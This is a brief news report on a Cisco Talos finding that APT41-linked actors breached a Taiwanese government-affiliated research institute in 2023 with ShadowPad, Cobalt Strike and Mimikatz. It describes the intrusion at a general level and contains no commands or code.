A government-affiliated research institute in Taiwan specializing in computing and related technologies was compromised by nation-state threat actors linked to China, as revealed by Cisco Talos.
The breach occurred in mid-July 2023, with the attackers deploying backdoors and post-compromise tools like ShadowPad and Cobalt Strike. The attack has been attributed to the APT41 hacking group with medium confidence.
Security researchers Joey Chen, Ashley Shen, and Vitor Ventura explained that the ShadowPad malware was used to exploit a vulnerable version of Microsoft Office to load a second-stage loader for launching the payload.
The actors compromised three hosts and exfiltrated documents from the network, Cisco Talos discovered in August 2023 when abnormal PowerShell commands were detected.
The attackers utilized a web shell to maintain access, executing PowerShell scripts to launch ShadowPad and Cobalt Strike, with the latter delivered using a Go-based loader named CS-Avoid-Killing.
Mimikatz was used to extract passwords, and PowerShell commands were run to execute ShadowPad and fetch Cobalt Strike from a compromised server. Other steps taken included exploiting CVE-2018-0824 for privilege escalation and deploying UnmarshalPwn.
The attackers attempted to avoid detection by stopping their activity upon detecting other users on the system. This revelation follows Germany’s disclosure of Chinese state actors behind a cyber attack in 2021.
China’s embassy in Berlin denied the accusation and called for an end to using cybersecurity for political smearing.
